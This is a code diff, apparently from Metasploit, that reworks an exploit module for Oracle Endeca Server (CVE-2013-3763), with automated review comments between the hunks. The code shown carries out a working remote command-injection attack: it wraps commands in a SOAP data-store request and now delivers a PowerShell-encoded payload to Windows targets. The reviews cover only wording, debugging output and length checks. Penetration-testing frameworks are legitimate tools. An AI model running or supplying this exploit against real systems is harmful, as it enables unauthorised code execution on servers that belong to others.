diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb
index 19ba6c2a83..e30b0b61bf 100644
--- a/modules/exploits/windows/http/oracle_endeca_exec.rb
+++ b/modules/exploits/windows/http/oracle_endeca_exec.rb
@@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpClient
- include Msf::Exploit::CmdStagerVBS
+ include Msf::Exploit::Powershell
 def initialize
 super(
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'juan vazquez' # Metasploit module
 ],
 'Platform' => 'win',
- 'Arch' => ARCH_X86, # Using ARCH_X86 because it's compatible with CmdStagerVBS
+ 'Arch' => [ ARCH_X86_64, ARCH_X86 ],
 'References' =>
 [
 [ 'CVE', '2013-3763' ],
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
 ],
 'Targets' =>
 [
- [ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2', { } ]
+ [ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits', { } ]
 ],
 'DefaultTarget' => 0,
 'Privileged' => false,
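Review bot: The new `'Arch'` line in the second hunk drops the only comment that explained the architecture choice, while the third hunk renames the sole target to "… 64 bits" yet `ARCH_X86` is still accepted next to `ARCH_X86_64`, so a reader has no stated reason why a 32-bit payload remains valid for a target now labelled 64-bit. A one-line comment on that entry would keep the rationale in the module, e.g. `'Arch' => [ ARCH_X86_64, ARCH_X86 ], # both accepted: payload is delivered by the PowerShell mixin (see exploit)`, which is grounded in the include swap of the first hunk; if the x86 entry is only kept for compatibility with existing payload sets, say that instead. The `super(` hash edited by the second and third hunks starts in the first hunk and continues past the end of the third.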
@@ -131,21 +131,24 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 def exploit
- print_status("#{peer} - Exploiting by deploying a VBS CMD Stager...")
- # Windows 2008 Command Prompt Max Length is 8191
- execute_cmdstager({ :delay => 0.35, :linemax => 7500 })
+ command = cmd_psh_payload(payload.encoded)
+ if command.length > 8000
+ # Windows 2008 Command Prompt Max Length is 8191
+ fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command")
+ end
+ print_status("#{peer} - Exploiting through Powershell...")
+ execute_command(command)
 end
- def execute_command(cmd, opts)
- # To delete spaces priors to crlf lines since it is an observed behavior on Win 2008
- cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\") : data = Replace(data, vbCrLf, \"\")")
+ def execute_command(cmd)
 # HTML encode ampersands so SOAP is correctly interpreted
 cmd.gsub!(/&/, "&")
 injection = "c:\\"& #{cmd} &""
 exploit_data = create_data_store_soap(rand_text_alpha(4), injection)
 begin
 res = send_request_soap(exploit_data)
- if res.nil? or res.code != 500 or res.body !~ /Error creating data files at/
+ if res.nil? or res.code != 500 or ( res.body !~ /Error creating data files at/ and res.body !~ /Data files don't exist/ )
+ print_status("#{res.code}\n#{res.body}") if res
 fail_with(Failure::UnexpectedReply, "#{peer} - Unable to execute the CMD Stager")
 end
 rescue ::Rex::ConnectionError
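Review bot: The `fail_with(Failure::UnexpectedReply, ...)` line kept as context in `execute_command` still reports "Unable to execute the CMD Stager", although this hunk removes the VBS stager and now sends a PowerShell one-liner; change it to `fail_with(Failure::UnexpectedReply, "#{peer} - Unable to execute the PowerShell command")`. The added `print_status("#{res.code}\n#{res.body}") if res` prints the entire HTTP response on every unexpected reply and reads like leftover debugging; `vprint_status` would keep that dump behind VERBOSE. The new `BadConfig` message also misspells `paylod`. The `> 8000` check measures the bare `command`, not the `c:\"& … &"` string that `execute_command` later builds around it, so the comment above the check should state that the remaining margin below 8191 is what is meant to absorb that wrapper, if that is the intent. The body of `execute_command` continues past the end of the hunk.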